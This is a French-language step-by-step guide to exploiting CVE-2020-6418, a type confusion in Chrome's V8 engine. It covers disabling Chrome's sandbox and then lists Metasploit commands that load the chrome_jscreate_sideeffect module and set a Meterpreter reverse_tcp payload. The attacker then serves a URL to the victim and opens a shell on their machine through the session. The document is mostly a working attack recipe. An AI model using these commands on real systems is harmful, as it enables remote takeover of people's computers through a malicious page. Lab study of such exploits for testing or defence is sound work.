
Exploit pour CVE-2020-6418, une confusion de type dans V8, permettant l'exécution de code à distance via une page HTML conçue. Utilise Metasploit pour fournir une charge utile de shell inverse.
Le CVE-2020-6418 concerne une confusion de type dans V8 de Google Chrome. Les versions affectées étaient antérieures à 80.0.3987.122. La vulnérabilité est exploitée par un attaquant distant accédant au shell d'un appareil cible via une page HTML conçue à cet effet.
Note : The Google chrome browser should run with no sandbox for the exploit to be succesfull.
i) Créez un raccourci pour Google Chrome
ii) Cliquez sur Propriétés > allez à l'option appelée "Cible"
iii) À la fin de EXE, donnez un espace et tapez -no--sandbox
iv) Cliquez sur Appliquer > OK
v) Ouvrez un nouveau navigateur Google Chrome et vous verrez une pop-up indiquant ceci :
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer
Puisque nous utilisons Kali comme environnement pour réaliser l'exploit, Metasploit est fourni en tant qu'outil intégré à la distribution. Mais si vous utilisez d'autres distributions, nous devons configurer Metasploit avant de commencer l'exploit.
Référez-vous à l'installation de Metasploit pour plus d'informations.
i) Démarrage du framework Metasploit
> msfconsole
ii) Trouvez l'exploit
> search chrome_js
iii) Utilisez l'exploit disponible dans la sortie ci-dessus
> Use exploit/multi/browser/chrome_jscreate_sideeffect
iv) Fournissez l'adresse IP SRVHOST
> set SRVHOST <ip address>
v) Fournissez la cible Ici, nous avons deux options
> set Target " Number "
vi) Fournissez la charge utile (payload)
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
vii) Pour vérifier les paramètres actuels et les options activées.
> show options
viii) Pour exécuter l'exploit
> run (or) > exploit
ix) Vous recevrez une URL, qui doit être copiée dans le navigateur pour activer la session.
x) Une fois que l'utilisateur accède à l'URL, une session sera créée. Pour vérifier cela
> show sessions
xi) En utilisant la session, nous pouvons vérifier les informations système de l'utilisateur / entrer dans le shell.
> sessions <number>
> shell